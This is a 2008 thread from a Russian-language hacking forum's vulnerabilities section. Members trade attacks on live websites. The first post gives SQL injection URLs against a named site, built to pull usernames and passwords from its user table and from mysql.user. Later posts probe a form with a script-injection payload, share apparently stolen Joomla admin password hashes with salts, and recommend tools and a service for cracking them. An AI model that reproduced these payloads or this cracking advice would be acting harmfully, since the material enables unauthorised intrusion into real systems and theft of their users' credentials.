HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.08.2008, 01:32
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Да что то информатион_схема недоступна.
Но мысли есть вот такие
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user_name)),6,7+from+us er


Вдогонку
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user)),6,7+from+mysql.u ser+limit+0,1

Последний раз редактировалось Red_Red1; 17.08.2008 в 01:41..
 
Ответить с цитированием

  #2  
Старый 17.08.2008, 07:14
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Цитата:
Вдогонку

это понятно..) я про information_schema спрашивал. всеровно спс.)

ап

Последний раз редактировалось sabe; 17.08.2008 в 20:21..
 
Ответить с цитированием

  #3  
Старый 17.08.2008, 08:05
Cry Wolf
Новичок
Регистрация: 18.07.2008
Сообщений: 12
С нами: 9376826

Репутация: 3
По умолчанию

Вопросик, сидел вводил всякое в поисках XSS. Ввел полную белеберду в поле ввода мыла
Цитата:
bla'<script>alert()</script>
получил переадресацию на другой сайт.

alert()> вылезло за пределы поля для ввода текста </script скушало. А вверху закрасовалось вот такая ошибка БД:

Цитата:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 176

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 181
Это уязвимость? Или просто тупой глюк?
 
Ответить с цитированием

  #4  
Старый 17.08.2008, 08:07
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

' ? = sql inj
 
Ответить с цитированием

  #5  
Старый 17.08.2008, 09:02
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

Достал я парол я хэши из джумлы

admin:6f0f0e2db9c8f58e2b309afa6569f744SX0uUSDl4I rdL63

или

admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

а как его рассшифровать?
где сервисы? просто md5 не помогает тут он какойто хитрожопый
как такое расшифровывать?
 
Ответить с цитированием

  #6  
Старый 17.08.2008, 09:32
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами: 10126406

Репутация: 206
По умолчанию

Цитата:
Сообщение от truelamer  
Достал я парол я хэши из джумлы

admin:6f0f0e2db9c8f58e2b309afa6569f744SX0uUSDl4I rdL63

или

admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

а как его рассшифровать?
где сервисы? просто md5 не помогает тут он какойто хитрожопый
как такое расшифровывать?
прога PasswordsPro при добавлении тип хеша указываешь MD5(HMAC), должно помочь
 
Ответить с цитированием

  #7  
Старый 17.08.2008, 10:02
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

спасибо но думаю не в этом дело, я то знаю сервисы где md5 можно подобрать, А тут вроде как конкотинасия пароля с правой кадаброй после :. Вот мне интересны сервисы кот позволяют узнать пароль вбив хэш и кадабру. Или как это вообще можно сделать
 
Ответить с цитированием

  #8  
Старый 17.08.2008, 11:02
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

Это не кадабра, это соль. Юзай PasswordsPro
 
Ответить с цитированием

  #9  
Старый 17.08.2008, 12:29
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

сервис..мм..попробуй, там по моему соленые мд5 тоже катят:
Цитата:
https://hashcracking.info/
 
Ответить с цитированием

  #10  
Старый 17.08.2008, 16:29
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

а вот это какого вида???

admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I

вида md5(md5($pass).$salt) или какого?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.